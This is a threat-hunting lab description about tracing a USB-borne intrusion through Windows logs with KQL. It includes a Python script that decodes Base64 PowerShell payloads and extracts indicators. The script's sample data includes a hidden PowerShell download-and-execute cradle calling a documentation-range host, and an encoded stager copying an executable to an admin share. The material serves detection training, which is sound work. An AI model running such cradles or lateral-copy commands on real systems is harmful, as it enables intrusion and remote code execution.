Universal Bus
Overview
This morning, someone left something behind on one of the seats. A small flash drive, unmarked, sitting right where the new IT contractor usually sits. Someone from facilities found it, figured it belonged to IT, and helpfully plugged it into an office workstation to check what was on it. Just trying to return it to its owner, right? By lunch, the SOC dashboard lights up. Nothing dramatic, just a few anomalies buried under thousands of routine log entries. A file copied to an odd location. A process spawning from a temp directory. An outbound connection to an IP nobody recognizes. Most analysts would scroll right past it. But you're not most analysts. Something rode that Universal Bus into your network, and now it's your job to figure out what.
Lab Details
Prerequisites & Requirements
- Windows Event Logs: Basic understanding of Event IDs, log levels, and common fields.
- KQL: Familiarity with Kusto Query Language — or willingness to learn as you go.
- Attack Lifecycle: Understanding of common attack stages: Initial Access → Staging → Execution → Lateral Movement → C2.
- Lab Environment: A KQL-capable interface will be provided with the challenge instance, pre-loaded with the dataset.
- Encoding Basics: Basic knowledge of Base64 encoding and decoding.
What Will You Learn?
- Threat Hunting at Scale: Performing structured hunts across a noisy, realistic corporate log dataset.
- USB-Based Initial Access: Identifying removable media insertion events and payload staging from Windows event logs.
- Attack Chain Tracing: Following payload staging, lateral movement via PsExec/SMB, and C2 beaconing patterns end-to-end.
- PowerShell Deobfuscation: Extracting and decoding obfuscated -EncodedCommand and FromBase64String() payloads hidden in command lines.
- Multi-Host Correlation: Correlating events across multiple hosts and timelines to reconstruct a full attack chain.
- Noise vs. Signal: Separating real indicators of compromise from decoys and background noise.
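An added example, not part of the lab or its dataset, showing how the PowerShell payload extraction listed above can be automated in Python: it pulls -EncodedCommand arguments (which PowerShell always treats as Base64 of UTF-16LE text) and FromBase64String() literals out of a process command line, decodes them, recurses into the decoded text for further layers, and harvests URLs and UNC paths from every layer so decoys with nothing behind them stand out from real staging. The command lines, the host name FS01 and the 198.51.100.23 address are constructed for the example (198.51.100.0/24 is a documentation range); in the lab the input would be the CommandLine field exported from the KQL interface.

```python
import base64
import re
from dataclasses import dataclass

# Any unambiguous prefix of -EncodedCommand works in PowerShell; these are the
# forms that show up in command lines in practice (-e, -ec, -enc, -EncodedCommand).
ENCODED_FLAG_RE = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})")
FROM_B64_RE = re.compile(r"""(?i)FromBase64String\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
URL_RE = re.compile(r"""https?://[^\s'"()]+""")
UNC_RE = re.compile(r"""\\\\[A-Za-z0-9_.-]+\\[^\s'"]+""")


@dataclass
class Layer:
    source: str  # "EncodedCommand" or "FromBase64String"
    depth: int   # 0 = found in the raw command line, 1 = inside a decoded layer, ...
    text: str


def b64_to_bytes(b64: str) -> bytes:
    """Decode Base64, tolerating stripped '=' padding so a decoder error cannot hide a payload."""
    try:
        return base64.b64decode(b64 + "=" * (-len(b64) % 4))
    except ValueError:
        return b""


def bytes_to_text(raw: bytes) -> str:
    """FromBase64String payloads are whatever the script later passes to GetString():
    usually ASCII/UTF-8, sometimes UTF-16LE. Even length with every odd byte NUL
    is the UTF-16LE signature for ASCII-range text."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_layers(cmdline: str, depth: int = 0, max_depth: int = 5) -> list[Layer]:
    """Decode every encoded payload in cmdline and recurse into the decoded text."""
    layers: list[Layer] = []
    if depth >= max_depth:  # guard against self-referential junk
        return layers
    for m in ENCODED_FLAG_RE.finditer(cmdline):
        # -EncodedCommand is defined as UTF-16LE, so decode it as such unconditionally.
        text = b64_to_bytes(m.group(1)).decode("utf-16-le", errors="replace")
        layers.append(Layer("EncodedCommand", depth, text))
        layers.extend(decode_layers(text, depth + 1, max_depth))
    for m in FROM_B64_RE.finditer(cmdline):
        text = bytes_to_text(b64_to_bytes(m.group(1)))
        layers.append(Layer("FromBase64String", depth, text))
        layers.extend(decode_layers(text, depth + 1, max_depth))
    return layers


def extract_iocs(cmdline: str, layers: list[Layer]) -> set[str]:
    """Collect URLs and UNC paths from the raw command line and every decoded layer."""
    found: set[str] = set()
    for text in [cmdline] + [layer.text for layer in layers]:
        found.update(URL_RE.findall(text))
        found.update(UNC_RE.findall(text))
    return found


def _ps_encode(script: str) -> str:
    """Encode the way 'powershell -EncodedCommand' expects: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed sample command lines (not from the lab dataset). FS01 is a made-up
# file server and 198.51.100.23 is in a documentation-only address range.
INNER_CMD = r"copy C:\Users\Public\svc.exe \\FS01\C$\Windows\Temp\svc.exe"
STAGER = ("IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + _b64(INNER_CMD) + "')))")
SAMPLE_LINES = {
    "benign": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    "decoy": "powershell.exe -e " + _ps_encode("Get-Date"),
    "staged": "powershell.exe -NoP -W Hidden -enc " + _ps_encode(STAGER),
    "downloader": ('powershell.exe -NoProfile -c "$u=[Text.Encoding]::ASCII.GetString('
                   "[Convert]::FromBase64String('" + _b64("http://198.51.100.23/a.ps1") + "'));"
                   'IEX (New-Object Net.WebClient).DownloadString($u)"'),
}

if __name__ == "__main__":
    for name, line in SAMPLE_LINES.items():
        layers = decode_layers(line)
        iocs = sorted(extract_iocs(line, layers))
        print(f"[{name}] {len(layers)} decoded layer(s); IOCs: {iocs or '-'}")
        for layer in layers:
            print(f"  depth {layer.depth} via {layer.source}: {layer.text}")
```

The decoy line decodes to a harmless Get-Date with no indicators, while the staged line yields a second layer containing the UNC copy to FS01, which is the kind of artifact to pivot on in the SMB and PsExec events of the target host. The UTF-16LE heuristic is deliberately conservative: it only fires for ASCII-range text, so a payload with non-ASCII characters falls back to UTF-8 and should be inspected by hand.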
Tools
- Query Interface: KQL Web Interface — provided with the challenge instance (pre-loaded dataset).
- Scripting: Python — for automated extraction and Base64 decoding (optional).
- Decoding: CyberChef or command-line tools — for quick Base64 decoding.